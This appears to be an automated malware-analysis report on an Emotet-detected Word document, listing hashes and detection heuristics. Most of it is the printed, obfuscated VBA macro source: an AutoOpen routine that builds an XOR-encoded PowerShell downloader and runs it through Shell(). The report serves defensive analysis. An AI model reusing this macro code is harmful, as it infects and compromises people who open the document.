Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cf34bafbecfbdf4c…

MALICIOUS

Office (OLE)

Size: 98.0 KB
Created: 2018-06-19 22:18:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: 73c4676628d1a6b79ec3d272b649c76d
SHA-1: c7fa53dc1965a1035ea91d2507b1930ec9f53e8b
SHA-256: cf34bafbecfbdf4cfc58eb4379d0c374bc59e08b5cdbabcc2da5790bf9551609
Risk score: 210

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros with an AutoOpen routine that leads to a Shell() call. The called routine assembles an obfuscated PowerShell command from string fragments and executes it, most likely to download and run a second-stage payload. The ClamAV detection (Doc.Malware.Emotet-6874849-0) independently confirms the file as malicious.

Heuristics 7

  • ClamAV: Doc.Malware.Emotet-6874849-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-6874849-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script:
    cNhWO = 18879
    CRZwI = CiYQnwV + Shell(NNoKitKjJ + KQWRPC + sjBXorS, 80292 - 80292)
    buloXo = CDate(73894)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    End Function
    Sub AutoOpen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   11557 bytes
SHA-256: 65f1e451374506ca9627bd4e612046139005d9e6254319f3281e78e0ad71a2d8
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PDZSnjAlWarDk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dRThTYqLGaQT"
Function kUIjAdLmpA()
On Error Resume Next
GQJVVz = 74633
YvYUJc = CByte(vaimPU)
TjmSF = 87736
piWFV = CDate(raEHAv + Sin(33983 + 88957) * 29751 * CInt(74612))
BvONfD = CDate(25906)
PbccKT = NHONG
WiuPAo = "OwerSHell  [Str" + "iNG]::JOin(" + " '' ,(" + "'18C87Y124" + "!70"
DHDEzZ = 60773
ZjHjc = CByte(QclcfL)
crzQiS = 19551
RIwoVo = CDate(IXXdkn + Sin(99777 + 76294) * 52226 * CInt(13063))
sNadT = CDate(94154)
iaDHAq = iqLtca
YsSmWaXKvUz = "C67C64!1" + "19a22" + "C11G22r88C83r65" + "-2" + "7G8" + "9{84{92" + "Y83G85G66" + "-22r68Y87" + "r88{8"
DHENzu = 45889
EmUvo = CByte(kKIIO)
IQCmcF = 64675
CXtnXr = CDate(vDnrf + Sin(19811 + 65654) * 12395 * CInt(13514))
wSOvzw = CDate(15443)
isGHm = ZEWol
TjioQLQ = "2!89G91a13G18a6" + "5a7" + "0G125{122r66" + "C119C22r11C2" + "2{88r83Y65C" + "27z89W8"
jYwzpG = 40139
idQLH = CByte(SEBoPO)
NnLzcp = 90983
oticY = CDate(cGvHR + Sin(62092 + 76162) * 16933 * CInt(41678))
jBClC = CDate(90098)
YZlVzz = npTawW
waPOWDwvVWj = "4W92C" + "83W" + "85G66G22C" + "101{79G69a6" + "6r83!91W24Y12" + "0C83C66r24r97" + "{83-" + "84Y" + "117" + "G90!9"
muKLJu = 42983
aKOIiL = CByte(ZZrIu)
HArPld = 64183
pjjzk = CDate(qKmoqR + Sin(11332 + 84869) * 30362 * CInt(66246))
FnfkBt = CDate(58851)
PCWmY = jBzhGf
pLRpQtCtWO = "5G83Y88z" + "66{13z18r95" + "G97a103Y92{125" + "-98r22a" + "11C22" + "!17r94C" + "66{66C70{" + "12G25C25-" + "65"
kUIjAdLmpA = WiuPAo + YsSmWaXKvUz + TjioQLQ + waPOWDwvVWj + pLRpQtCtWO
End Function
Function jSzbDhZE()
On Error Resume Next
tYaOm = 5210
chNXz = CByte(mrIiR)
qjbWc = 5093
pZqHlB = CDate(VdvXl + Sin(66533 + 27033) * 47480 * CInt(35374))
AwkFjf = CDate(21204)
jhGVJ = hTijNI
JosWDu = "r65z65z2" + "4{9" + "5r66C91z85C9" + "0-" + "95!88" + "z95W85-" + "24C" + "68-67" + "z25z116r"
GlwQRN = 24007
fMmXS = CByte(AzELfq)
ZECHWV = 198
nJMlW = CDate(MzlpEw + Sin(44023 + 43152) * 77428 * CInt(42654))
nDUqM = CDate(20441)
pqjpmX = wMhTi
wrwFtahur = "84W" + "3C89Y25W11" + "8W94z66" + "r66-70G12a25-25" + "-65" + "G65z65a24C" + "87a85r85W89r67"
BqZDL = 28990
jTnwj = CByte(BWiPB)
wfoCzH = 81702
ztPzS = CDate(tnzHm + Sin(51546 + 15266) * 7032 * CInt(25182))
BoJutO = CDate(18436)
tUBCYi = rViwM
nmkwT = "Y88z66W95G88a" + "81z9" + "0a95W88r83-" + "24z95!88W80z"
njKfN = 43979
cafwb = CByte(AZNGr)
nzRTvi = 3245
DbwYIw = CDate(oFoqX + Sin(22148 + 21475) * 4406 * CInt(27806))
UYdkX = CDate(64754)
DAkavG = vHpWfK
jJAuzH = "89Y25" + "!123{" + "1{1" + "21{122r25!118{" + "94a66!66a70W1" + "2{25!25{65W"
BFcuk = 42492
fGRJij = CByte(zVHVW)
TwsSK = 72008
urHjt = CDate(wfwAVF + Sin(21924 + 53786) * 66703 * CInt(8457))
BHAJvs = CDate(7267)
bPPAv = aHYVu
wzuiulbA = "65W65W24{85" + "r83G88!66{" + "67G6" + "8{79z90W87{65W2"
KapzY = 33974
GzRSZ = CByte(voUcn)
kdwTnU = 82456
afBcm = CDate(qTtvm + Sin(31356 + 82930) * 67527 * CInt(47229))
wfhcV = CDate(23400)
aqFwW = iiQim
sJhos = "4r64Y79!6" + "7a82r67!2" + "4{66" + "Y83z85r94W25" + "!94{8" + "5a122" + "W91C67C2"
EWiRiE = 4331
iMwpaZ = CByte(lPQhR)
CiVmw = 29519
wSdWs = CDate(ADLoNR + Sin(12584 + 72763) * 92675 * CInt(8157))
XMIOD = CDate(67543)
wMKXMD = mYrhK
IXkbm = "5Y" + "118!9" + "4-66W" + "66a70a12-25" + "{25Y6Y3{5"
jSzbDhZE = JosWDu + wrwFtahur + nmkwT + jJAuzH + wzuiulbA + sJhos + IXkbm
End Function
Function worEFlZJ()
On Error Resume Next
aztYCa = 52295
QLObH = CByte(RqYskO)
JlpTV = 82968
ivUpjV = CDate(zTmUl + Sin(55292 + 39277) * 42249 * CInt(25817))
jToTt = CDate(79402)
FCuloz = LAcqdF
StBIwz = "z4Y82{88W87z" + "24" + "!85z89{91" + "z25Y71r110W92z" + "119z25a11" + "8r94z66!66" + "r70{12" + "G25r25r6" + "5W65{65" + "Y24{9"
umTRX = 73092
zmlNF = CByte(NquAu)
vJEMw = 97894
LAnAAW = CDate(LPaTQ + Sin(22257 + 40977) * 23774 * CInt(27648))
aijsQW = CDate(27062)
cXuqSq = ZXQuOu
ZcLBpmz = "4a76!81a67r91C" + "83C95C24r88a" + "83C66{25W0Y7" + "-125" + "G79-96{5a25z17Y"
NjFCaT = 64148
mFSRBo = CByte(TqsJwa)
vJWfw = 8150
INPFP = CDate(oorXHv + Sin(71861 + 20538) * 54192 * CInt(92711))
GKzVXX = CDate(13649)
OzpNTp = KkdvF
XILwwj = "24W101z70a90r9" + "5G66" + "a30!17z118" + "-17z31z13G1" + "8-89G123" + "r95"
vZKfC = 2783
qfrviA = CByte(JaRtoY)
TPKsGl = 64628
zYGNXt = CDate(pmKLSD + Sin(19323 + 59582) * 85679 * CInt(65937))
viKti = CDate(73596)
EcmjF = HfnAuz
jimokjsc = "!94z67!2" + "2G11G22r1" + "8a" + "87C1" + "24G7" + "0!67!64C119G24" + "{88{83" + "Y78G66C3" + "0W7-26Y22{1!1" + "4C1G5Y2G1r31z1"
HjTnH = 64594
VEQmc = CByte(dJpOTU)
AiqTc = 76050
DsRYHA = CDate(zwSww + Sin(8634 + 71558) * 18620 * CInt(67222))
sFwun = CDate(46480)
IXFqFU = nRbSBk
mTDFWMfD = "3C18!84" + "r93" + "Y124Y89r127W" + "98W22!11C"
fbifNW = 34515
PUiXL = CByte(PSBzYm)
BcVFBD = 3745
ORjvs = CDate(waKrwM + Sin(35344 + 3337) * 13962 * CInt(67917))
pYjwLu = CDate(92521)
YlkQoV = AGpCu
tXifAGvF = "22!" + "18W83{8" + "8{64G12-66r83z9" + "1W70" + "-22" + "!29z22"
TJTrqG = 50176
SnRAS = CByte(ILzZvc)
PRDjF = 75834
MAEhCF = CDate(RYwPib + Sin(77420 + 3068) * 71256 * CInt(88917))
lntjbp = CDate(42560)
OTKGb = ZhhWZ
kCinnaRwJ = "a17G106{17W" + "22W29Y22{" + "18z89!" + "123G95{94z6" + "7!22r29" + "-2" + "2r"
worEFlZJ = StBIwz + ZcLBpmz + XILwwj + jimokjsc + mTDFWMfD + tXifAGvF + kCinnaRwJ
End Function
Function RabEFGbjEsA()
On Error Resume Next
TQhju = 51271
jzTzlI = CByte(KaCjGY)
NshXb = 28550
ariOXb = CDate(hnQfA + Sin(52402 + 53136) * 26361 * CInt(69274))
HVYFrM = CDate(67132)
RZEqBC = OQLuJa
KFjlhu = "17G24G" + "83a78G83z" + "17Y13{80{89{68" + "W83{87a85-9"
kKJtP = 30821
YVjHoV = CByte(niIZpj)
CCJQc = 53909
tEmVM = CDate(OvwmmX + Sin(81313 + 90647) * 60027 * CInt(75110))
HPGXMN = CDate(34450)
FcaOZ = mfYdvD
jAWiZ = "4a30z18W90" + "G103" + "G82C122a" + "94C22" + "r95!88r2" + "2{18{95Y" + "97-103Y92G1"
SItYi = 22116
CLJLkT = CByte(HlrtT)
UqErlD = 34585
jkOaTD = CDate(CwiBf + Sin(27311 + 22516) * 68819 * CInt(38035))
zpoCT = CDate(83649)
RKkUu = RWIWV
pZcwCbv = "25-98C" + "31z77C66z68r" + "79Y77r18z65{70{" + "12"
jshBzL = 5903
OFtQWZ = CByte(JGGoUz)
aiLsa = 54779
odIRWf = CDate(djUjN + Sin(53609 + 15205) * 5248 * CInt(54738))
KjvZc = CDate(84044)
HuGvk = OzzfhA
UJfLvtZ = "5C122-66Y1" + "19Y24z" + "114Y89a65" + "C88r90{89-8"
wztLfX = 73133
GVvIE = CByte(SilBDw)
CtsDE = 73251
Cjhar = CDate(HAuQM + Sin(86118 + 17569) * 82889 * CInt(58575))
TXArcd = CDate(87930)
ZwPIAZ = Wiqibt
LcEqDVVEk = "7a" + "82Y112r95Y9" + "0r83{30-18G90" + "r103r82-1" + "22r94" + "{24r98C8" + "9z101{66G6"
hNjKh = 83169
qFlcsQ = CByte(jOlAc)
FiaRX = 45771
SAFms = CDate(sjjwS + Sin(66313 + 12207) * 61891 * CInt(47552))
KwAdjG = CDate(49744)
BjcDW = HDcuDl
HhihN = "8a9" + "5r88r81" + "{30-31-26W22G1" + "8-84!" + "93C124!" + "89!127-98Y31" + "Y13Y" + "101W66z87{68Y" + "66" + "W27r102r68G89Y"
jqAvZ = 95427
nhtliX = CByte(bziWrn)
iSbIS = 79591
sRiIT = CDate(KihiY + Sin(93859 + 38403) * 41905 * CInt(66675))
BJzRGW = CDate(50263)
ZOSih = ujkLij
nlOZFNbXE = "85z83z69a69W22" + "z18W8" + "4r93C124C89{" + "127Y98a13C84!6" + "8G83a8" + "7G93r"
RabEFGbjEsA = KFjlhu + jAWiZ + pZcwCbv + UJfLvtZ + LcEqDVVEk + HhihN + nlOZFNbXE
End Function
Function JwjCHNVl()
On Error Resume Next
CWDVQO = 93897
SqZjbo = CByte(rEvnvW)
amithV = 4495
zoBjF = CDate(DKwNS + Sin(99733 + 4461) * 27165 * CInt(87484))
YIvij = CDate(6104)
wFNlbX = ftGBz
QaLUBzcOjH = "13W75Y85-87" + "r66!85G94r77-6" + "5Y68{" + "95-66z83a27W94" + "G89r69Y" + "66-22W1" + "8-105r24!1" + "15W78G85W83G70"
zVipj = 14498
UvTniW = CByte(YSRkZb)
RlGkpw = 90376
kGVsrN = CDate(kiwuPi + Sin(21312 + 96547) * 73847 * CInt(25723))
mzFFP = CDate(43095)
ZdNPc = vaCNVd
ZNflptzAGjN = "{66!95z89{88W24" + "{12" + "3G83Y69C69!8" + "7C" + "81Y83G1" + "3z75C75'"
IwonUp = 19748
KoNrlq = CByte(OUdXzQ)
amHNf = 48908
bInSf = CDate(fYbHH + Sin(71635 + 56221) * 85380 * CInt(47591))
lOBMc = CDate(58733)
lzbss = LazWz
UMbXbYwV = ".s" + "pLiT('YGr!" + "WaC-{" + "z'" + ")|" + " %"
fZZGZN = 80106
WQLnSM = CByte(PPBmf)
urDWW = 12284
pzuFDI = CDate(iMrBiC + Sin(42198 + 79393) * 19417 * CInt(72943))
zMUIT = CDate(36073)
fzUWsL = uXiNEz
MduqzBcsHi = "{ [cHa" + "R] (" + "$_" + " -bXOR 0x36  )" + "}) " + ")| . ( $vErBOsE" + "PrEFereNCE.ToS" + "triN" + "G()[1,3]+'X'"
JTXDXz = 15225
pHCiZo = CByte(dTHiM)
wcEYR = 45469
LSSnfz = CDate(fzSVL + Sin(71974 + 34063) * 64425 * CInt(50863))
lKVHu = CDate(91541)
WXSbN = PouZXI
EnIqJ = "-JO" + "IN'')"
JwjCHNVl = QaLUBzcOjH + ZNflptzAGjN + UMbXbYwV + MduqzBcsHi + EnIqJ
End Function

Function wrUWbToQ()
On Error Resume Next
hRrdwF = CDate(21195)
Zbthz = DrKizH
QRzUQk = 57639
PNruwP = CByte(YdSQz)
jwjUAf = CDate(wfYwG + Sin(68947 + 3105) * 11048 * CInt(81928))
RfSHjR = 19942
zBqoHQ = CDate(75309)
BBCzSj = ImOjJm
wkQawu = 37607
qjMBDY = CByte(REjwdc)
Sojzbr = CDate(HzDkAT + Sin(3720 + 76270) * 12147 * CInt(74700))
EONXV = 7926
SEOYp = CDate(32059)
IYnSnv = VCfiZ
mozkvt = 53682
vOkBO = CByte(laSVz)
vFoPli = CDate(ONFPXn + Sin(42221 + 74630) * 83548 * CInt(1036))
uiMjQ = 13726
jPjoj = CDate(39662)
zNmSD = NkjmEU
zSTAYU = 6032
LffMOZ = CByte(stcRtN)
bpWkCz = CDate(EnuTrD + Sin(19550 + 42650) * 99490 * CInt(42058))
niFkqI = 54843
SPCAT = CDate(21355)
JGGbzb = kGtKp
ZsnFh = 97251
KFKPK = CByte(hGHImY)
JwZfqt = CDate(ZVwNVz + Sin(24491 + 49985) * 59354 * CInt(53929))
mWSrLf = 58546
End Function
Function wDwXICEjtS()
On Error Resume Next
cGnFPf = CDate(20745)
ZPbcS = JKhCSd
QiHlJ = 91484
YJska = CByte(JEZhA)
wjUOzz = CDate(scwpo + Sin(61842 + 75103) * 22876 * CInt(93445))
sFwUS = 84553
DaRzdQCJJhl = MwPhP + Chr(mnsSj + 80 + IiZXAaXF)
SvwPD = CDate(11805)
UCpOWl = dZShB
dlczQc = 51489
MRouqE = CByte(QjwjmK)
qLUTHX = CDate(mdLpSR + Sin(96692 + 29279) * 25824 * CInt(47161))
ZUIVG = 38677
iwVEc = CDate(20189)
AdZqQ = tRkLE
ijBiGm = 82795
sFDhX = CByte(iDucoj)
wJcIt = CDate(EnALIk + Sin(89550 + 71127) * 70923 * CInt(37574))
jadbaV = 67484
wDwXICEjtS = zJMfwjnfc + DaRzdQCJJhl + kUIjAdLmpA + jSzbDhZE + worEFlZJ + RabEFGbjEsA + JwjCHNVl
jqImzF = CDate(38504)
LEaViq = omtDf
uoZXvD = 68060
Eodti = CByte(Ezlah)
fITPBq = CDate(LDBuN + Sin(58264 + 49653) * 25487 * CInt(92634))
Xqjwow = 40120
End Function
Function FBsrdCR(KQWRPC)
On Error Resume Next
OwRfQd = CDate(9229)
hjppi = iBncrT
roksv = 68515
URJdMF = CByte(BtPART)
flRbSU = CDate(pciGV + Sin(38413 + 40529) * 70211 * CInt(50157))
iFaql = 46481
mZfrXW = CDate(29966)
ijcBvL = CoaZL
kmUlD = 74172
KzHtL = CByte(LjuPow)
BvdjM = CDate(ivPDm + Sin(93058 + 40869) * 37236 * CInt(7623))
cNhWO = 18879
CRZwI = CiYQnwV + Shell(NNoKitKjJ + KQWRPC + sjBXorS, 80292 - 80292)
buloXo = CDate(73894)
pHUVm = FUSBQ
dKzdd = 75643
MBAcTV = CByte(IruOIp)
FZHJBC = CDate(jwYIj + Sin(97039 + 1034) * 77580 * CInt(96110))
pFwsV = 93370
End Function
Sub AutoOpen()
On Error Resume Next
pjBHS = CDate(17027)
KZHYRa = iKTUl
VKUwkL = 92226
AImbFn = CByte(hhSUSQ)
JocDN = CDate(vVLjKq + Sin(36190 + 9533) * 22593 * CInt(61558))
csnXqU = 18471
Application.Run pzPvkRNAN + "FBsrdCR" + ZYYzisfE, OftsVIF + wDwXICEjtS + bOfph
ZCIbkQ = CDate(12485)
rhUfz = dwGizq
sLmMV = 67323
bzwdD = CByte(ztBusN)
DvOrW = CDate(ROVLv + Sin(83026 + 83328) * 5509 * CInt(24581))
LcFcs = 45445
End Sub